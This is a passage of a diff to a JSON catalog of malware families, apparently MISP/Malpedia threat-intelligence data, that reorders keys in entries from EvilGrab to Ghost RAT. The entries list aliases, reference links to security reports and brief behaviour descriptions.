"438c6d0f-03f0-4b49-89d2-40bf5349c3fc", - "value": "EvilGrab", - "description": "" + "value": "EvilGrab" }, { + "description": "Privately modded version of the Pony stealer.", "meta": { - "synonyms": [ - "CREstealer" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony", "https://techhelplist.com/spam-list/1104-2017-03-27-your-amazon-com-order-has-shipped-malware", "https://threatpost.com/docusign-phishing-campaign-includes-hancitor-downloader/125724/", "https://www.s21sec.com/en/blog/2017/07/ramnit-and-its-pony-module/" - ] + ], + "synonyms": [ + "CREstealer" + ], + "type": [] }, "uuid": "e26579d9-1d93-4a3b-a41e-263254d85189", - "value": "EvilPony", - "description": "Privately modded version of the Pony stealer." + "value": "EvilPony" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evrial", "https://www.bleepingcomputer.com/news/security/evrial-trojan-switches-bitcoin-addresses-copied-to-windows-clipboard/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "af3a3ece-e67f-457a-be72-7651bc720342", - "value": "Evrial", - "description": "" + "value": "Evrial" }, { + "description": "", "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.excalibur", + "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies" + ], "synonyms": [ "Sabresac", "Saber" ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.excalibur", - "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies" - ] + "type": [] }, "uuid": "3cec2c3c-1669-40cf-8612-eb826f7d2c98", - "value": "Excalibur", - "description": "" + "value": "Excalibur" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.exchange_tool", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", "https://github.com/nccgroup/Royal_APT" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "74f8db32-799c-41e5-9815-6272908ede57", - "value": "MS Exchange Tool", - "description": "" + "value": "MS Exchange Tool" }, { + "description": "", "meta": { - "synonyms": [ - "ExtRat" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.extreme_rat", "https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html", "https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html", "https://community.rsa.com/community/products/netwitness/blog/2017/08/02/malspam-delivers-xtreme-rat-8-1-2017", "https://www.symantec.com/connect/blogs/colombians-major-target-email-campaigns-delivering-xtreme-rat" - ] + ], + "synonyms": [ + "ExtRat" + ], + "type": [] }, "uuid": "6ec2b6b1-c1a7-463a-b135-edb51764cf38", - "value": "Xtreme RAT", - "description": "" + "value": "Xtreme RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eye_pyramid", "https://securelist.com/blog/incidents/77098/the-eyepyramid-attacks/", "http://blog.talosintel.com/2017/01/Eye-Pyramid.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a7489029-21d4-44c9-850a-8f656a98cb22", - "value": "Eye Pyramid", - "description": "" + "value": "Eye Pyramid" }, { + "description": "According to Talos, this trojan injects into other processes, disables security features and tries to contact several domains, waiting for instruction.\r\n\r\nThere seem to be two versions of this malware: one with the FakeDGA-domains in plaintext, and one with AES-ECB-encrypted domains (using the Windows-API).", "meta": { - "synonyms": [ - "WillExec" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakedga", "https://github.com/360netlab/DGA/issues/36", "http://blog.talosintelligence.com/2017/10/threat-round-up-1020-1017.html", "http://www.freebuf.com/column/153424.html" - ] + ], + "synonyms": [ + "WillExec" + ], + "type": [] }, "uuid": "31c248cb-51b5-4bb7-801f-d8520d2b5789", - "value": "FakeDGA", - "description": "According to Talos, this trojan injects into other processes, disables security features and tries to contact several domains, waiting for instruction.\r\n\r\nThere seem to be two versions of this malware: one with the FakeDGA-domains in plaintext, and one with AES-ECB-encrypted domains (using the Windows-API)." + "value": "FakeDGA" }, { + "description": "", "meta": { - "synonyms": [ - "Braviax" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakerean", "https://blog.threattrack.com/fakerean-comes-of-age-turns-hard-core/", "https://0x3asecurity.wordpress.com/2015/11/30/134260124544/", "https://www.exploit-db.com/docs/english/18387-malware-reverse-engineering-part-1---static-analysis.pdf", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/FakeRean#technicalDiv" - ] + ], + "synonyms": [ + "Braviax" + ], + "type": [] }, "uuid": "653df134-88c9-47e2-99a5-06e0406ab6d4", - "value": "FakeRean", - "description": "" + "value": "FakeRean" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.faketc", "http://www.welivesecurity.com/2015/07/30/operation-potao-express/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6b0030bc-6e45-43b0-9175-15fe8fbd0942", - "value": "FakeTC", - "description": "" + "value": "FakeTC" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fanny", "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/#_1" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6d441619-c5f5-45ff-bc63-24cecd0b237e", - "value": "Fanny", - "description": "" + "value": "Fanny" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fantomcrypt", "https://www.webroot.com/blog/2016/08/29/fantom-ransomware-windows-update/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "29f4ae5a-4ccd-451b-bd3e-d301865da034", - "value": "FantomCrypt", - "description": "" + "value": "FantomCrypt" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fast_pos", "http://documents.trendmicro.com/assets/fastPOS-quick-and-easy-credit-card-theft.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-updates-in-time-for-retail-sale-season/", "http://documents.trendmicro.com/assets/Appendix%20-%20FastPOS%20Updates%20in%20Time%20for%20the%20Retail%20Sale%20Season.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1bf03bbb-d3a2-4713-923b-218186c86914", - "value": "FastPOS", - "description": "" + "value": "FastPOS" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.felismus", "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "07a41ea7-17b2-4852-bfd7-54211c477dc0", - "value": "Felismus", - "description": "" + "value": "Felismus" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.felixroot", "https://medium.com/@Sebdraven/when-a-malware-is-more-complex-than-the-paper-5822fc7ff257", "https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e58755ac-3d0c-4ed3-afeb-e929816c8018", - "value": "Felixroot", - "description": "" + "value": "Felixroot" }, { + "description": "Feodo (also known as Cridex or Bugat) is a Trojan used to commit e-banking fraud and to steal sensitive information from the victims computer, such as credit card details or credentials.", "meta": { - "synonyms": [ - "Cridex", - "Bugat" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.feodo", "http://contagiodump.blogspot.com/2012/08/cridex-analysis-using-volatility-by.html", "https://feodotracker.abuse.ch/", "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", "http://www.sempersecurus.org/2012/08/cridex-analysis-using-volatility.html" - ] + ], + "synonyms": [ + "Cridex", + "Bugat" + ], + "type": [] }, "uuid": "66781866-f064-467d-925d-5e5f290352f0", - "value": "Feodo", - "description": "Feodo (also known as Cridex or Bugat) is a Trojan used to commit e-banking fraud and to steal sensitive information from the victims computer, such as credit card details or credentials." + "value": "Feodo" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ff_rat", "https://www.cylance.com/en_us/blog/breaking-down-ff-rat-malware.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e701b875-8ade-434f-89ff-6c367099bfd8", - "value": "FF RAT", - "description": "" + "value": "FF RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fileice_ransom", "https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ed0b8ac9-973b-4aaa-9904-8c7ed2e73933", - "value": "FileIce", - "description": "" + "value": "FileIce" }, { + "description": "", "meta": { - "synonyms": [ - "Poseidon" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.findpos", "https://researchcenter.paloaltonetworks.com/2015/03/findpos-new-pos-malware-family-discovered/", "https://blogs.cisco.com/security/talos/poseidon" - ] + ], + "synonyms": [ + "Poseidon" + ], + "type": [] }, "uuid": "ae914b9a-67a2-425d-bef0-3a9624a207ba", - "value": "FindPOS", - "description": "" + "value": "FindPOS" }, { + "description": "", "meta": { - "synonyms": [ - "FinSpy" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.finfisher", "https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html", @@ -6526,97 +6526,99 @@ "http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation", "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf", "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/" - ] + ], + "synonyms": [ + "FinSpy" + ], + "type": [] }, "uuid": "541b64bc-87ec-4cc2-aaee-329355987853", - "value": "FinFisher RAT", - "description": "" + "value": "FinFisher RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fireball", "http://blog.checkpoint.com/2017/06/01/fireball-chinese-malware-250-million-infection/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9ad28356-184c-4f02-89f5-1b70981598c3", - "value": "Fireball", - "description": "" + "value": "Fireball" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.firecrypt", "https://www.bleepingcomputer.com/news/security/firecrypt-ransomware-comes-with-a-ddos-component/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c4346ed0-1d74-4476-a78c-299bce0409bd", - "value": "FireCrypt", - "description": "" + "value": "FireCrypt" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.firemalv", "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9715c6bc-4b1e-49a2-b1d8-db4f4c4f042c", - "value": "FireMalv", - "description": "" + "value": "FireMalv" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.first_ransom", "https://twitter.com/JaromirHorejsi/status/815949909648150528" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1ab17959-6254-49af-af26-d34e87073e49", - "value": "FirstRansom", - "description": "" + "value": "FirstRansom" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedammyy", "https://github.com/Coldzer0/Ammyy-v3", "https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/", "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", "https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "18419355-fd28-41a6-bffe-2df68a7166c4", - "value": "FlawedAmmyy", - "description": "" + "value": "FlawedAmmyy" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flexispy", "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4305d59a-0d07-4021-a902-e7996378898b", - "value": "FlexiSpy", - "description": "" + "value": "FlexiSpy" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.floki_bot", "http://blog.talosintel.com/2016/12/flokibot-collab.html#more", @@ -6627,42 +6629,42 @@ "https://www.arbornetworks.com/blog/asert/flokibot-flock-bots/", "https://www.flashpoint-intel.com/blog/cybercrime/floki-bot-emerges-new-malware-kit/", "https://www.flashpoint-intel.com/flokibot-curious-case-brazilian-connector/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "057ff707-a008-4ab8-8370-22b689ed3412", - "value": "FlokiBot", - "description": "" + "value": "FlokiBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.floxif", "https://www.virusbulletin.com/virusbulletin/2012/12/compromised-library" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b1b2e501-b68f-4e2e-ab98-85e9bda0fbcd", - "value": "Floxif", - "description": "" + "value": "Floxif" }, { + "description": "Available since 2015, Flusihoc is a versatile C++ malware capable of a variety of DDoS attacks as directed by a Command and Control server. Flusihoc communicates with its C2 via HTTP in plain text.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flusihoc", "https://www.arbornetworks.com/blog/asert/the-flusihoc-dynasty-a-long-standing-ddos-botnet/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "79e9df7d-abc8-45bd-abd3-be9b975f1a03", - "value": "Flusihoc", - "description": "Available since 2015, Flusihoc is a versatile C++ malware capable of a variety of DDoS attacks as directed by a Command and Control server. Flusihoc communicates with its C2 via HTTP in plain text." + "value": "Flusihoc" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fobber", "http://blog.wizche.ch/fobber/malware/analysis/2015/08/10/fobber-encryption.html", @@ -6670,16 +6672,16 @@ "https://blog.malwarebytes.com/threat-analysis/2015/06/elusive-hanjuan-ek-caught-in-new-malvertising-campaign/", "https://www.govcert.admin.ch/blog/12/analysing-a-new-ebanking-trojan-called-fobber", "http://byte-atlas.blogspot.ch/2015/08/knowledge-fragment-unwrapping-fobber.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bb836040-c161-4932-8f89-bc2ca2e8c1c0", - "value": "Fobber", - "description": "" + "value": "Fobber" }, { + "description": "FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called \"Babushka Crypter\" by Insidemalware.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook", "https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html", @@ -6689,116 +6691,113 @@ "https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/", "http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html", "https://blog.talosintelligence.com/2018/06/my-little-formbook.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8378b417-605e-4196-b31f-a0c96d75aa50", - "value": "Formbook", - "description": "FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called \"Babushka Crypter\" by Insidemalware." + "value": "Formbook" }, { + "description": "", "meta": { - "synonyms": [ - "ffrat" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.former_first_rat", "https://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/" - ] + ], + "synonyms": [ + "ffrat" + ], + "type": [] }, "uuid": "9aacd2c7-bcd6-4a82-8250-cab2e4e2d402", - "value": "FormerFirstRAT", - "description": "" + "value": "FormerFirstRAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.freenki", "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/", "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f86b675a-b7b2-4a40-b4fd-f62fd96440f1", - "value": "Freenki Loader", - "description": "" + "value": "Freenki Loader" }, { + "description": "", "meta": { - "synonyms": [ - "BitPaymer" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex", "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" - ] + ], + "synonyms": [ + "BitPaymer" + ], + "type": [] }, "uuid": "58ae14a9-c4aa-490c-8404-0eb590f5650d", - "value": "FriedEx", - "description": "" + "value": "FriedEx" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.furtim", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4341&sid=af76b944112a234fa933cc934d21cd9f", "https://sentinelone.com/blogs/sfg-furtims-parent/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c9d78931-318c-4b34-af33-c90f6612a4f1", - "value": "Furtim", - "description": "" + "value": "Furtim" }, { + "description": "GalaxyLoader is a simple .NET loader. Its name stems from the .pdb and the function naming.\r\n\r\nIt seems to make use of iplogger.com for tracking.\r\nIt employed WMI to check the system for\r\n- IWbemServices::ExecQuery - SELECT * FROM Win32_Processor\r\n- IWbemServices::ExecQuery - select * from Win32_VideoController\r\n- IWbemServices::ExecQuery - SELECT * FROM AntivirusProduct\r\n", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.galaxyloader" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c12f1363-2bc8-4ffb-8f31-cbb5f85e0ffe", - "value": "GalaxyLoader", - "description": "GalaxyLoader is a simple .NET loader. Its name stems from the .pdb and the function naming.\r\n\r\nIt seems to make use of iplogger.com for tracking.\r\nIt employed WMI to check the system for\r\n- IWbemServices::ExecQuery - SELECT * FROM Win32_Processor\r\n- IWbemServices::ExecQuery - select * from Win32_VideoController\r\n- IWbemServices::ExecQuery - SELECT * FROM AntivirusProduct\r\n" + "value": "GalaxyLoader" }, { + "description": "", "meta": { - "synonyms": [ - "pios" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gamapos", "http://documents.trendmicro.com/assets/GamaPOS_Technical_Brief.pdf" - ] + ], + "synonyms": [ + "pios" + ], + "type": [] }, "uuid": "8f785ee5-1663-4972-9a64-f02e7c46ba66", - "value": "gamapos", - "description": "" + "value": "gamapos" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_dga" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c4afb7c6-cfba-40d7-aa79-a2829828ed92", - "value": "Gameover DGA", - "description": "" + "value": "Gameover DGA" }, { + "description": "Gameover ZeuS is a peer-to-peer botnet based on components from the earlier ZeuS trojan. According to a report by Symantec, Gameover Zeus has largely been used for banking fraud and distribution of the CryptoLocker ransomware. In early June 2014, the U.S. Department of Justice announced that an international inter-agency collaboration named Operation Tovar had succeeded in temporarily cutting communication between Gameover ZeuS and its command and control servers.", "meta": { - "synonyms": [ - "ZeuS P2P", - "GOZ" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_p2p", "https://www.wired.com/?p=2171700", @@ -6806,30 +6805,31 @@ "http://www.syssec-project.eu/m/page-media/3/zeus_malware13.pdf", "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware", "https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf" - ] + ], + "synonyms": [ + "ZeuS P2P", + "GOZ" + ], + "type": [] }, "uuid": "ffc8c386-e9d6-4889-afdf-ebf37621bc4f", - "value": "Gameover P2P", - "description": "Gameover ZeuS is a peer-to-peer botnet based on components from the earlier ZeuS trojan. According to a report by Symantec, Gameover Zeus has largely been used for banking fraud and distribution of the CryptoLocker ransomware. In early June 2014, the U.S. Department of Justice announced that an international inter-agency collaboration named Operation Tovar had succeeded in temporarily cutting communication between Gameover ZeuS and its command and control servers." + "value": "Gameover P2P" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gamotrol" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9664712b-81f1-4c52-ad4d-a657a120fded", - "value": "Gamotrol", - "description": "" + "value": "Gamotrol" }, { + "description": "", "meta": { - "synonyms": [ - "GrandCrab" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab", "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/", @@ -6842,44 +6842,44 @@ "https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html", "http://csecybsec.com/download/zlab/20181001_CSE_GandCrabv5.pdf", "https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/" - ] + ], + "synonyms": [ + "GrandCrab" + ], + "type": [] }, "uuid": "a8d83baa-cf2e-4329-92d7-06c8ccdeb275", - "value": "win.gandcrab", - "description": "" + "value": "win.gandcrab" }, { + "description": "Gaudox is a http loader, written in C/C++. The author claims to have put much effort into making this bot efficient and stable. Its rootkit functionality hides it in Windows Explorer (32bit only).", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gaudox", "http://nettoolz.blogspot.ch/2016/03/gaudox-http-bot-1101-casm-ring3-rootkit.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "591b2882-65ba-4629-9008-51ed3467510a", - "value": "Gaudox", - "description": "Gaudox is a http loader, written in C/C++. The author claims to have put much effort into making this bot efficient and stable. Its rootkit functionality hides it in Windows Explorer (32bit only)." + "value": "Gaudox" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gauss", "http://contagiodump.blogspot.com/2012/08/gauss-samples-nation-state-cyber.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5f8be453-8f73-47a2-9c9f-e8b9b02f5691", - "value": "Gauss", - "description": "" + "value": "Gauss" }, { + "description": "", "meta": { - "synonyms": [ - "WhiteBear" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gazer", "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/", @@ -6887,46 +6887,45 @@ "https://www.youtube.com/watch?v=Pvzhtjl86wc", "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", "https://github.com/eset/malware-ioc/tree/master/turla" - ] + ], + "synonyms": [ + "WhiteBear" + ], + "type": [] }, "uuid": "0a3047b3-6a38-48ff-8f9c-49a5c28e3ada", - "value": "Gazer", - "description": "" + "value": "Gazer" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gcman", "https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ed0586d1-4ff0-4d39-87c7-1414f600d16e", - "value": "gcman", - "description": "" + "value": "gcman" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gearinformer", "https://wapacklabs.blogspot.ch/2017/02/rebranding-ispy-keylogger-gear-informer.html", "https://www.rekings.com/ispy-customers/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5e699f4d-9ff6-49dd-bc04-797f0ab2e128", - "value": "GearInformer", - "description": "" + "value": "GearInformer" }, { + "description": "", "meta": { - "synonyms": [ - "Emotet", - "Heodo" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.geodo", "https://malfind.com/index.php/2018/07/23/deobfuscating-emotets-powershell-payload/", @@ -6945,99 +6944,99 @@ "https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/", "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1" - ] + ], + "synonyms": [ + "Emotet", + "Heodo" + ], + "type": [] }, "uuid": "d29eb927-d53d-4af2-b6ce-17b3a1b34fe7", - "value": "Geodo", - "description": "" + "value": "Geodo" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmail", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6f155c95-3090-4730-8d3b-0b246162a83a", - "value": "GetMail", - "description": "" + "value": "GetMail" }, { + "description": "", "meta": { - "synonyms": [ - "getmypos" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmypass", "https://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-evolution-of-point-of-sale-pos-malware", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-pos-malware-kicks-off-holiday-shopping-weekend/", "https://securitykitten.github.io/2015/01/08/getmypass-point-of-sale-malware-update.html" - ] + ], + "synonyms": [ + "getmypos" + ], + "type": [] }, "uuid": "d77eacf7-090f-4cf6-a305-79a372241158", - "value": "GetMyPass", - "description": "" + "value": "GetMyPass" }, { + "description": "", "meta": { - "synonyms": [ - "CoreImpact (Modified)" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghole", "https://www.clearskysec.com/gholee-a-protective-edge-themed-spear-phishing-campaign/", "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf", "https://www.coresecurity.com/core-impact" - ] + ], + "synonyms": [ + "CoreImpact (Modified)" + ], + "type": [] }, "uuid": "ef4383f6-29fd-4b06-9a1f-b788567fd8fd", - "value": "Ghole", - "description": "" + "value": "Ghole" }, { + "description": "", "meta": { - "synonyms": [ - "Remosh" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostnet", "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html", "https://en.wikipedia.org/wiki/GhostNet" - ] + ], + "synonyms": [ + "Remosh" + ], + "type": [] }, "uuid": "e1410684-c695-4c89-ae5f-80ced136afbd", - "value": "Gh0stnet", - "description": "" + "value": "Gh0stnet" }, { + "description": "", "meta": { - "synonyms": [ - "Ghost iBot" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_admin", "https://www.bleepingcomputer.com/news/security/new-ghostadmin-malware-used-for-data-theft-and-exfiltration/", "https://www.cylance.com/en_us/blog/threat-spotlight-ghostadmin.html" - ] + ], + "synonyms": [ + "Ghost iBot" + ], + "type": [] }, "uuid": "6201c337-1599-4ced-be9e-651a624c20be", - "value": "GhostAdmin", - "description": "" + "value": "GhostAdmin" }, { + "description": "", "meta": { - "synonyms": [ - "PCRat", - "Gh0st RAT" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat", "https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/", @@ -7048,44 +7047,47 @@ "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/", "http://www.hexblog.com/?p=1248", "https://blog.cylance.com/the-ghost-dragon" - ] + ], + "synonyms": [ + "PCRat", + "Gh0st RAT" + ], + "type": [] }, "uuid": "225fa6cf-dc9c-4b86-873b-cdf1d9dd3738", - "value": "Ghost RAT", - "description": "" + "value": "Ghost RAT" }, { + "description": "", "meta": { - "synonyms": [ - "Wordpress Bruteforcer" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glasses", "https://forum.exploit.in/pda/index.php/t102378.html" - ] + ], + "synonyms": [ + "Wordpress Bruteforcer" + ], + "type": [] }, "uuid": "1c27b1a3-ea2a-45d2-a982-12e1509aa4ad", - "value": "Glasses", - "description": "" + "value": "Glasses" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glassrat", 